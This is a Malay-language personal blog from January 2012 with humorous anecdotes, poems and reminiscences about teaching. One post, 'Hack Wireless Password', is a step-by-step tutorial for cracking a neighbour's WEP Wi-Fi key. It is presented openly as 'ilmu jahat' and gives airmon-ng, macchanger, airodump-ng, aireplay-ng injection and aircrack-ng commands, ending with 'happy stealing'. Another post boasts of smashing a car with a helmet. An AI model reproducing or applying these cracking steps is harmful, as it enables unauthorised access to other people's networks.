Monday, 30 January 2012

Kantoi dengan "Abang Angkat"

Abang angkat?
Macam mana yer ..
Adakah macam ni ?


Atau macam ini?



Ataupun yang gini?



Musykil lah ...
Tapi ..
Kini baru aku percaya dengan panggilan " abang angkat " ..
Sebabnya,
Semalam hasil sekodeng aku dan jiran² ..
Kami dapat tangkap 1 couple ni .. 
Mike tengah peluk-peluk , cium-cium  n ape2 lagi tah..
Dan dengan yakinnya..
Memang terangkat laa abang tu kerjakan ...

Bila disoal mike kata mike ni abang dan adik angkat ..
Aku pon, tak tahu nak cite camne ..
Kau dengar sendiri lah perbualan kami ..

Warning : Perbualan takde tapis ..  :-)



Macam biasa ah , muka tak tunjuk :-)

Sekian :-)

Friday, 27 January 2012

Tiada Mood Untuk Blogging

Semenjak dua menjak ni, ramai tanya kenapa jarang nampak aku blogwalking ..
Aku akui, sekarang ni rasa dah 'letih' untuk blogging ..
Kalau nak kata tiada topik untuk ditulis, tak juga..
Sebabnya, dalam draf masih banyak lagi entry yang aku dah tulis tapi tak dipulbishkan .

Sejujurnya, mood blogging aku dah pupus ..
Cha, miera dan puteri kasih antara mereka yang tanya kenapa ..
Aku pon tak pasti ..
Sesekali aku cuba juga cari mood untuk hadap pc ni dengan lebih lama untuk bw dan borak²..
Tapi dah tak boleh ..

Bukan sibuk jaga bini pon ..
Awek apetah lagi ..
Mungkin sebab aku letih ..
Sebab aku jogging 1 hari 5 kali .

Sesekali rasanya nak drop je blog ni ..
Tapi .. sayang rasanya ..
Tahu kenapa?


Faham tak maksud gambar ni?
Orang pergi ke google dan taip "MR ASLAN" ..
Pelik kot .. ni orang nak stalk aku ker atau peminat :-)
Kalau orang pergi google dan taip Najwa Latiff tu aku tak heran laa ..
Tapi dia find mr aslan .

Mungkin orang yangg google ni ialah orang yang dekat dengan aku ..
Ataupun yang mengenali aku ..
Dia sayang aku, tapi malu-malu kot..
Tak sangka aku ada peminat ...(dush dush tumbuk dahi skali sebab perasan)
Tapi sedey ah, nama peminat tapi tak ingat URL blog aku :-(
Tapi apepon terharu sangat dia sudi google nama aku ..

Apepon, just nak beritahu ...
Mungkin mood saya berubah disebabkan 1 perkara ..
HMm ..

Tolonglah ...

" Jangan buat perkara yang menyebabkan saya rasa diri ini menganggu anda .."


Thursday, 26 January 2012

Kalau Perempuan ...


Kalau perempuan cantik pendiam
lelaki akan kata: wow!ciri2 isteri idaman...
Kalau perempuan tak cantik pendiam
Lelaki akan kata: tak reti berkomunikasi agaknyer...

Kalau perempuan cantik berbuat jahat
Lelaki akan kata: mst ada krisis nih...kesiannyer...
Kalau perempuan tak cantik berbuat jahat
Lelaki akan kata: dah la tak lawa,perangai plak mcm sial!!

Kalau perempuan cantik menolong lelaki yg kesusahan
Lelaki akan kata: wow!heroin sejati...
Kalau perempuan tak cantik menolong lelaki yg kesusahan
Lelaki akan kata: hmm...taktik nak ngorat la tu...

Kalau perempuan cantik dpt lelaki handsome
Lelaki akan kata: ok la...bagai pinang d belah dua...
Kalau perempuan tak cantik dpt lelaki handsome
Lelaki akan kata: kesian...mst dah kena bomoh lelaki tu...

Kalau perempuan cantik d tinggal kekasih
Lelaki akan kata: buta kayu btol mamat tu!!
Kalau perempuan tak cantik d tinggal kekasih
Lelaki akan kata: patut pon kena reject...

Wednesday, 25 January 2012

Iklan Pintar L&G

Dimana kita boleh lihat perkara seperti ini ? :

i . Rabbit 'memburu' carrot dari peti ais ..
ii. Beruang guna microwave ...
iii. Penguin basuh baju ..

Nice :-)

Sunday, 22 January 2012

### KELU , KAKU ###

Perasaan aku sekarang bercampur-baur ..
Tiada apa yang dapat digambarkan tentang apa yang aku rasa sekarang ni.
Kenapalah aku lambat?
Last sekali rugi ...

Tapi aku bukanlah jenis orang,
Yang hanya tahu puaskan kehendak hati sendiri ..
Namun apa yang perlu someone tahu ..
Aku tak mahu engkau merintih ..

Cukuplah bagi aku ..
Asal kau gembira ..
Akhirnya aku juga kan bahagia ..
Aku tak pernah marah , cuma aku sedih ..

Apepon biarlah aku camni,
Daripada melihat someone pening memikirkan apa yang terbaik ..
Kataku sebagai orang yang terakhir ..
I love you always :-)


Friday, 20 January 2012

Thursday, 19 January 2012

Iklan Polident

"Cuma sapu di bahagian bawah gigi palsu, dan ia akan melekap dengan sempurna"



Apokono eh jang ekau marah-marah sampai tercabut gigi tu?

Tuesday, 17 January 2012

Vanilla Coklat

Untuk sekian lama aku tak menghadap tv pada waktu malam,
Tetiba time dinner tadi, aku tertonton drama Vanilla Coklat ni ..
Kalau sebelum ni bila tengok drama, asik muka sama ..
So kali ni tengok pelakon yang aku tak pernah nampak .. tak sure dia ni pelakon baru atau aku yg pepandai kata dia ni baru


Mood aku malam ni pon bertukar , 
Tetiba terfikir pasal kahwin ..
Dan baru berapa hari lepas, 'someone' tanya sama ada dah ready untuk kahwin :-)
'Someone'..sorry yer..blom ready tapi hati kite kat awk kot.:-) 
grrrr.. 
Btw, cerita vanilla coklat ni nampak best sebab orang rock kapak macam aku pon bleh layan :-)

Sunday, 15 January 2012

Hack Wireless Password

Kenapa SUKA sangat cari artikel berkaitan HACK WIFI ni??
hahaha..mesti kau juga macam aku kan!!!
BTW
Kali ni, aku kasi sikit la ilmu jahat yang aku ada..
Ini berkenaan dengan hacking wifi ..
Rasanya tak banyak tutorial yang dapat membantu ..
Tapi tutorial ni, dijamin dapat membantu kerja jahat korang ni.

Tapi, tutorial ini hanya pernah dicuba untuk WEP key ..
Untuk wpa aku tak pernah cuba ..

Untuk hack wep password,
Korang perlukan benda ni ..

1 . BACKTRACK 4 . ( cari, download, dan burn dalam cd , then install)



##########################################################
NOTES (SELALU RUJUK BAHAGIAN INI KALAU TAK FAHAM)

##########################################################

wlan0 = Interface (Examples: wlan0 atau ath0 atau eth0)

ch = The channel the target is on (Examples: 6 atau 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”


##########################################################
LANGKAH UNTUK HACK 

##########################################################


1. Boot laptop kau dengan gunakan Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Buka Konsole dan taip perkataan berikut:
3. airmon-ng (Kau akan nampak tau Interface apa yang digunakan)
4. airmon-ng stop wlan0 ***Kebiasaanya interface ialah wlan0. Tapi, setting ikut interface korang ***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Tekan CTRL+C selepas korang cari WEP yang nak dihack, kemudian copy dia punya  BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Buka Konsole baru dan taip seperti di bawah ni:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Kemudian buka lagi  Konsole yang baru dan taip seperti di bawah ni :
15. aircrack-ng -b (bssid) (file name)-01.cap


Tunggulah .. mungkin ia mengambil masa sedikit untuk dapatkan password.



Selamat mencuri !

Friday, 13 January 2012

Trouble Night

Malam ni, aku takde ape nak buat  ..
Dah ler plan nak lepak, tetiba member aku kata tak jadi ..
Then, bila usyar-usyar pemandangan malam  ..
Aku dapat tengok wayang free dari sebuah kereta depan rumah aku ..

Ini yang buat darah abang lan mendidih ni ..
Berani betul honeymoon dalam kereta ..
Depan rumah aku pulak ..
Pikir bapak aku buat sewa bilik ker depan rumah ..

Terus laaa aku naik HONDA ex5 aku tu..
Dan block kereta dia..
Sampai-sampai je terus aku ketuk tingkap .. dah macam penguatkuasa JAIM dah.
Tengok-tengok ada couple Cina tengah berlakon opera..
Tapi kali ni dalam kereta jer..
Budget tak cukup, penonton takde .
So training dalam kereta jelah

Dah suruh keluar kereta tapi takmo ,
Lepas tu dengan selamber je nak cabut lari ..
Aku ni plak baik hati ...
Berbekalkan helmet dan kekeringan hati ,
Aku hempuk kereta dia sekuat ati ..


P/S : rasanya aku dah cipta masalah lagi..

wait ... 'they' will come and catch you.

Sunday, 8 January 2012

#ini bukan pantun/sajak/gurindam/.Ini ialah ..ahh aku punya sukalah apepon#

Aku pernah mengenali cinta ,
Tapi terhenti disebabkan dusta ,
Walaupun ianya agak sengsara ,
Namun aku pernah gembira.


Bukan mudah untuk bersama ,
Kalau hati tak mampu menerima ,
Sedangkan lagu ada irama ,
Inikan cinta, ibaratnya drama .


Adakala ketawa , dan akhirnya berendam air mata ,
Bila terlalu leka, akhirnya kita kecewa ,
Tapi kita selalu lupa, apa yang Allah kurnia,
Ianya cuma seketika, nikmat hidup di dunia.


Original create by Mr.Aslan

Saturday, 7 January 2012

Isteri Tak Kisah Kalau ....



Eh ! ni apehal lak gambar manusia berambut cendawan ni?
Dan apehal lak payung sepah-sepah kat blog aku ni?
Kalau payung Pink takpelah jugak..
Ni warna emas .. seganlah nak bawak jalan pergi Pavi ~ tak uptodate lah!

Petang tadi kebetulan mood jogging aku slow sikit,
Jadi aku banyak relaxlah.
Lepastu jumpe plak geng pakcik-pakcik ni,
Join sekaki la borak-borak dengan diorang.

Masa aku datang, ada 3 orang pakcik ni sedang borak,
Tema soalan SPM yang bincangkan mereka ialah ...
 " buka cawangan lagi 1 "

Alkisahnya, sorang pakcik ni ..
Umur dalam lingkungan kubur kata mari, rumah kata pergi ..
Jadi, dia minta pendapat rakan-rakan .

Katanya, ISTERI DIA TAK KISAH  kalau nak kawin lagi..
Dalam kepala aku fikir, mesti isteri dia nak dapatkan payung kat atas tu.
Untunglerrrrrr pakcik.....
 " BAIKNYA ORANG PEREMPUAN " 



Cuba pulak si isteri yang cakap pada suami,
" Bang, ayang 'rasa' macam nak kawin lagi satu la " ..
Tak laki tu senyum n serta-merta ceraikan isteri (sebab boleh terus jadi bujang) .
Ataupun, pada hari itu si isteri boleh merasa air tangan suami ..
Time sayang, suami kasi cop halal , tapi bila marah, suami kasi cop bodyglove kat muka isteri tu.
" Jadi ,wan nak pesan pada cik dan puan-puan di rumah agar jangan mencuba resipi di atas yer "

Tapi ...
Bila sebut pasal nak kahwin lagi satu,
Ada laki yang kena tidur atas lantai,
Ada juga tak boleh tidur sebilik , meskipun bilik air ..
Dan paling extreme, isteri bertukar profesion menjadi tok mudim . *sia-sia je walaupun suami nak buka 4 cawangan*
Semuanya gara-gara sebut pasal kahwin lagi satu.


Kebetulan, Encik Ram ketua bagi team senamrobik kat Stadium Tun Fatimah,
Jadi, banyaklah kawan perempuan untuk dijadikan calon.
Dan cadangan yang Encik Ram ni kasi terbaekkk je ..
Kira apa yang dicakap tu macam dah kire jadik la tu .

Demm .. aku budak bawah umur dah layan skali cite kawin.
Dalam gelak² dan saling bertukar-tukar tips,
Tiba-tiba datang isteri kepada si pakcik yang nak kawin lagi satu ni ..

Ceh~ suami automatik control air muka dan terus tukar topic ,
Isteri dia datang, hulurkan handset kepada suami dia suruh dengar ..
Glupppp ...
Terus pakcik nak kawin lagi satu ni cakap "Eh ni suara Encik Ram ni"
KAMI terdiam ...

Kali ni isteri dia pulak bercakap *dengan muka sedih yang dicover-cover bagai tak sedih*

" I hear all your conversation "
" nak tambah cawangan ? "
" tak cukup kuat? "

bla bla bla .. memang masak ler orang tua tu kene bebel ..

*lalu si isteri berlalu pergi sambil hujan renyai-renyai turun di dalam hati*

Terus sang suami terdiam ..
Kami pula tergelak ..
Adoi ..
Katanya " Isteri Tak Kisah ... "

Thursday, 5 January 2012

Gangster Kampung Dusun

Pagi-pagi buka harian hmetro ,
Tajuk utama dia ...
Fuhhh ~

Ape nak jadik ni?
Ni yang cikgu tension ni ..
Suruh pergi sekolah, taknak .
Suruh belajar, lari ..
Baru je semalam start sekolah , harini dah cerita masalah budak sekolah

mr aslan blog, aslan blog, aslanmy, mohd aslan, aslan , sarip dol , gangster , 3line, 3 line, 36, 30, aslan blog


Budak sekolah?
Gangster ?
Puihhh!!!
Gangster taik kucing namanya ..

Masa aku pergi germany 3 hari atas tiket PATI   ..
Baik saje masyarakat sana ..
Takde pulak kata nak masuk gangster ,
Semuanya masuk gangbang.

Hish~
Kalau pandai takpe jugak.
Ini otak kosong,
Jadi hero dan berlagak di tempat sendiri jer.
Nak jadi apa?

Sarip Dol ker?


"Tak guna lu bawak pisau ke peraduan menembak, "
"Tak guna ada bola kalau tak reti sepak, "
"Tak guna ada jalan kalau destinasi tak nampak, "
"Tak guna jadi gangster kalau tiada wang, "


Gangster pon kene pandai,
Kalau harap kuat tapi otak tak pandai, lu jadi amoi laaa ..

" kucing bawa tidur ... rimau bawa igau "
" masuk tempat orang ... bawa otak bukan pisau "


 p/s : tak payah jadi gangster , tak payah jadi brader .. jadi orang berada sudah ..

Tuesday, 3 January 2012

Cikgu Aslan

Akhirnya ..
Sekolah dibuka kembali .
Takdelah aku tengok budak-budak bawah umur ni online 24jam.
Lepastu pm facebook aku untuk minta chips poker. * tak reti berjudi tanyalah cikgu cara berjudi *
Itu je keje diorang.

Tapi ,
Disebabkan budak bawah umur jugaklah ..
Aku main blog :-)
Student aku jugalah yang membuka pintu tandas untuk aku main blog ni:-)
Credit to Nazatul Haniz

Nak citer ni,
Sebenarnya ..
Aku pernah jadi cikgu, tapi sekarang dah pencen.. :-(
Seronok sangat ..
Mengajar kat sekolah menengah ..
Amali Solat , Pendidikan Seni , Pendidikan Jasmani .. dan paling penting, Sivik dan bukannya Syirik :-)


mr aslan blog, aslan blog, aslanmy, mohd aslan, aslan ,aslan blog
Inilah hasil aku mengajar seni pada budak-budak :-)

Kadang-kadang sakit kepala gak ..
Suruh diam taknak , time exam tak boleh buat ..
Penah sekali masa jaga exam Tingkatan 2,
Dengan niat murni dan penuh dedikasi..
Aku pon cakaplah "siapa tak faham angkat tangan"
Apa yang terjadi?
Hampir satu kelas angkat tangan..
Bedebah tol , korang semua memang nak mintak pelempang.

Masa mengajar pulak,
Kalau aku ada kencing manis,
Rasanya dah lama kene kerat kaki ni ..
Mana taknya , korang tengok sendirilah bahasa diorang .
Memang sakit hati je kalau nak beri markah.

mr aslan blog, aslan blog, aslanmy, mohd aslan, aslan ,aslan blog
Mengajak kawan "usya" awek

Mengingat kembali saat-saat jadi cikgu ,
Gugup ada, cuak ada ..
Budak perempuan sekarang berani beb ~.. jerit-jerit minta nombor telefon  *serius tak tipu*
Masa 1st perhimpunan , kena pulak duduk depan ..
Segan gilerrr sebab budak-budak ni semua pandang..maklumlah orang tak ensem
Lama-kelamaan,
Budak-budak ni semua sayor jer. :-)

Bila tengok budak degil, ponteng dan tak buat kerja,
Aku gelak jer ..
Dulu aku camni gak , tapi alhamdulillah masuk U jugak -)
Ramai tak percaya sampaikan cikgu aku pon cakap aku tak layak masuk U. hak3.

Lastly masa tamat kontrak,
Sedih dan terharu siot
Sebab budak-budak ni bodek aku
Diorang buat benda ni untuk aku

mr aslan blog, aslan blog, aslanmy, mohd aslan, aslan ,aslan blog

P/S : So kepada orang yang tak suka jadi cikgu , try dulu baru tahu rasanya.

Monday, 2 January 2012

Imej Pelik

Gambar di bawah ini disenep oleh aku ketika kerja ..
Dan bagi siapa yang masih tak tahu kerja saya, boleh lihat di Entry Ini
Dalam gambar ini memang ada gambar 'pelik' sikit ..
mr aslan blog, aslan blog, aslanmy, mohd aslan, aslan , pulau besar, hantu , pelik, seram, aslan blog
Klik la imej ni untuk tumbesaran yang maksimum

Disebabkan tempat kerja yang agak seronok , aku juga dapat gambar yang ini.
Untuk pengetahuan korang, kawasan ini merupakan ..
"kawasan yang tidak dibenarkan mengambil gambar"

Pelik..ske hati oranglah nak kamera ke washing machine ke ,
Tapi kenapa yer?
Tapi, dimanakah yang peliknya?
Trylah cari .

p/s : Entry request daripada Eyja .


** EDIT **

Siotlah .. disebabkan korang memang tak berapa perasan,
Terpaksalah aku sendiri tunjukkan ..


Masa aku kerja, aku pernah tengok satu video orang berbaring atas kubur dengan "muka" macam ni juga..

Amaran : Jangan Masak Air ...

Kejadian ni aku alami tadi..

Aku panaskan air yang sedia ada dalam kettle,
Tapi paras air dalam tu taklah banyak sangat..
Dipendekkan cerita , aku tak berapa rajin nak tambah air ..

Tapi, cerita kalau pendek sangat tak best kan?
So ...

Nak dijadikan cerita, puas tunggu sampai air tu masak.
Tapi tak masak-masak juga ..
Sedangkan aku tengok wap air dah keluar banyak sangat .
Sampai berasap-asap ..

Terus aku jadi musykil ..
Sepanjang 25 tahun bergelar masterchef bahagian memasak air,
Tak pernah lagi aku masak air keluar asap.
Tapi malam ni pelik sikit ..

Lalu terus aku buka penutup kettle tu,
Sekali .....
"Fuhhh .."
Kus semangat ..
Air dalam kettle jadi kering ... *air kering ape ada hal, biasalah tak bayar bil*

Dan lebih memeranjatkan lagi ialah ,
Besi dalam kettle tu warna macam kat ni ..


1st aku fikir dalam hati ..
Biasalah tu .. kalau besi tak panas bila masa pula air nak panas ..
Jadi aku pon isi semula air dan niat nak masak yang baru ..

Bila suis kettle ditekan ON ..
Rumah aku terus gelap-gelita ..
HuHu ..
Syukur .. selamatlah benda tu tak meletup

P/S : Isi air biar penuh-penuh dan Jangan malas-malas ..